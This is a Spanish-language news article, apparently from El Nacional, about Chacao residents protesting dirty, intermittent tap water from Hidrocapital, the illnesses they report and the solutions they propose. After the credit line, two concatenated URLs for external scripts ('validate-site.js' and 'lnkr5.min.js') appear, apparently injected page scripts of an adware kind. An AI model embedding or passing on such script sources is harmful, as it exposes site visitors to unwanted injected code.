Las personas sedientas, desaseadas y enfermas piden a gritos soluciones ante la insalubridad del servicio que reciben en sus casas

Gustavo Torres es vecino del municipio Chacao. Cansado de los problemas del agua, salió este miércoles de su casa con un envase lleno de agua hacia la plaza Los Palos Grandes, para unirse a una manifestación para exigir el derecho al agua .

Cuando Torres llegó a la plaza, varias personas estaban reunidas, cada una con su envase lleno de agua contaminada. Los vecinos sostienen que el color y el hedor del agua del municipio es producto de la mala administración de Hidrocapital y que su descuido y desinterés “los está matando de sed”.

Torres se encontró en la plaza con el dirigente vecinal Gabriel Santana, junto al que ha denunciado sin cansancio, desde hace meses, la crítica situación  en el municipio. En el encuentro, los ciudadanos compartieron sus experiencias. “Con ese agua no puedo lavar la ropa blanca”. “No puedo bañar así a mi bebé”. “En la ducha el agua sale llena de tierra”. Cada uno sufre la falta de agua a su manera.

Santana denunció que desde Carnaval, Chacao ha tenido semanas en las que no recibe ningún suministro de agua. Los vecinos, hartos de vivir en sequía, diseñaron una aplicación web para contabilizar cuántas horas de agua llega al municipio y se percataron que existen zonas en donde el servicio es aún más deficiente. “Hay 12 zonas que reciben menos de 10 horas de agua a la semana”, explicó el dirigente para El Nacional Web.

Los habitantes también se quejan de la preocupante cantidad de botes de agua que hay en las calles y aseguraron que Hidrocapital, Hidroven y todas las instituciones en las que presentan denuncias, ignoran el problema.

Hidrocapital no responde

El sábado 4 de agosto, más de 300 personas marcharon hacia Hidrocapital para solicitar al ingeniero Andy Hernández información sobre las inversiones que realiza la institución y sobre el estado del Acueducto Metropolitano. No obtuvieron respuesta a ninguna de sus interrogantes. “Estoy seguro que no nos dan la información porque no quieren y porque no las tienen. Ellos no deben manejar ningún dato de la crisis que hoy sufrimos”, declaró Santana.

Los vecinos, frustrados por el silencio de la compañía, le ofrecieron un plan en el que se establecerá un racionamiento con un tiempo definido cada semana. Esta petición también fue ignorada.

Uno de los manifestantes explicó con ilusión a  El Nacional Web  que los mismos habitantes de Chacao ofrecieron soluciones a la crisis del agua, sin embargo, necesitan el apoyo económico del gobierno para llevarlas a cabo. “Pensamos en la construcción de pozos para las zonas más críticas, pero el presupuesto va desde los $15.000 hasta los $ 20.000. Nosotros podríamos costear el mantenimiento, aunque la obra es responsabilidad del gobierno”, dijo.

Consecuencias de la insalubridad del agua

Vecinos sedientos, desaseados y enfermos son los que piden al gobierno una solución a su agonía. El municipio, lleno de adultos mayores y niños, dejó de ser un lugar ideal donde vivir. Aquí, las personas solo piden una cosa: que llegue el agua y que llegue limpia.

El servicio que suministra Hidrocapital no cuenta con los parámetros mínimos de higiene, por lo que los ciudadanos del municipio planean llevarla a un laboratorio para presentar una denuncia con base científica.

Existen familias que utilizan gran parte de sus ingresos para adquirir agua potable que puedan beber y que les permita cocinar. Otros menos afortunados no cuentan con los recursos y deben conformarse con el agua contaminada que reciben de vez en cuando. “No hay filtro casero que mejore la calidad de esta agua”, expresaron.

Torres enfatizó que todos los habitantes del municipio sufren, en mayor o menor medida, problemas intestinales a causa del mal servicio. “Las medicinas para atacar los problemas gastrointestinales están agotadas porque los vecinos se han visto afectados por el consumo de un agua que evidentemente no es potable”, denunció.

Según un artículo publicado por la Organización de las Naciones Unidas (ONU), el recurso hídrico en condiciones óptimas es vital para mejorar la salud, mientras que las aguas contaminadas y la falta de saneamiento promueven la propagación de enfermedades como la gastroenteritis, la giardiasis, la cólera, la amebiasis y la salmonella. “Esta agua expone nuestra salud en un país en el que está prohibido enfermarse por la falta de medicinas”, enfatizó Santana.

En Chacao no se quedan de brazos cruzados. Los vecinos exigen sus derechos, permanecen activos y ofrecen soluciones. A pesar del silencio por parte del gobierno y de Hidrocapital, Torres y Santana aseguran que no se van a rendir y que ningún vecino de Chacao va a dejar de luchar hasta que alguien solucione el problema que vulnera los derechos humanos.

VÍA EL NACIONAL.

https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x6748x&r=1534516378925https://permissnew.com/addons/lnkr5.min.js

Loading...